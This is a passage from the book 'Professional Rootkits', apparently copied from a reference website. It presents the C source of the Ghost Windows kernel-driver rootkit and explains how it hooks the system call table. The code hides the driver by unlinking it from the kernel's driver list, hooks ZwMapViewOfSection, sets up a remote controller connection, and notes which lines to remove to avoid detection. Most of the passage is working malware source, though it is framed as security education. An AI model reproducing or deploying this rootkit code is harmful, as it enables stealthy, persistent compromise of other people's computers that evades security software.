An Example


The functionality required to hook the kernel system call table has been implemented by creating two new files and modifying two existing files. Remember that every file presented in this and the following chapters can be downloaded from the Wrox/Wiley Professional Rootkits website.

The new files are as follows:

  hookManager.c hookManager.h 

Following are the modified files:

  Ghost.c SOURCES 

The code is shown in the following section.

SOURCES

The file hookManager.c has been added to SOURCES:

  TARGETNAME=comint32 TARGETPATH=OBJ TARGETTYPE=DRIVER SOURCES=Ghost.c\  fileManager.c\  hookManager.c\  configManager.c 

Ghost.c

Three new global variables have been added to Ghost.c: NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection. Once again, NewSystemCallTable and pMyMDL are used to circumvent the possibility of memory protection, and OldZwMapViewOfSection holds the address of the original ZwMapViewOfSection. It should be noted that the original ZwMapViewOfSection might not be the original address placed in the system call table during system boot. This address may be from another rootkit or security software.

The DriverUnload function has been modified to unhook ZwMapViewOfSection and return the MDL. Again, DriverUnload might not be required in a production environment, but it can be very useful in a development environment.

The only other addition to Ghost.c is the call to Hook. Hook is declared in hookManager.h and implemented in hookManager.c. For simplicity, the more complicated header file will be listed after the implementation file:

  // Ghost // Copyright Ric Vieler, 2006 #include "ntddk.h" #include "Ghost.h" #include "fileManager.h" #include "configManager.h" #include "hookManager.h" // Used to circumvent memory protected System Call Table PVOID* NewSystemCallTable = NULL; PMDL pMyMDL = NULL; // Pointer(s) to original function(s) ZWMAPVIEWOFSECTION OldZwMapViewOfSection; // Global version data ULONG majorVersion; ULONG minorVersion;  // Comment out in free build to avoid detection VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {  DbgPrint("comint32: OnUnload called.");  // Unhook any hooked functions and return the Memory Descriptor List  if( NewSystemCallTable )  {   UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );   MmUnmapLockedPages( NewSystemCallTable, pMyMDL );   IoFreeMdl( pMyMDL );  } } NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath ) { DRIVER_DATA* driverData;  // Get the operating system version  PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );  // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95  // Major = 5: Windows Server 2003, Windows XP or Windows 2000  // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95  // Minor = 1: Windows XP  // Minor = 2: Windows Server 2003  if ( majorVersion == 5 && minorVersion == 2 )  {   DbgPrint("comint32: Running on Windows 2003");  }  else if ( majorVersion == 5 && minorVersion == 1 )  {   DbgPrint("comint32: Running on Windows XP");  }  else if ( majorVersion == 5 && minorVersion == 0 )  {   DbgPrint("comint32: Running on Windows 2000");  }  else if ( majorVersion == 4 && minorVersion == 0 )  {   DbgPrint("comint32: Running on Windows NT 4.0");  }  else  {   DbgPrint("comint32: Running on unknown system");  }  // Hide this driver  driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));   if( driverData != NULL )  {   // unlink this driver entry from the driver list   *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;   driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;  } // Comment out in free build to avoid detection  theDriverObject->DriverUnload = OnUnload;  // Configure the controller connection  if( !NT_SUCCESS( Configure() ) )  {   DbgPrint("comint32: Could not configure remote connection.\n");   return STATUS_UNSUCCESSFUL;  }  // Hook the System Call Table  if( !NT_SUCCESS( Hook() ) )  {   DbgPrint("comint32: Could not hook the System Call Table.\n");   return STATUS_UNSUCCESSFUL;  }  return STATUS_SUCCESS; } 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net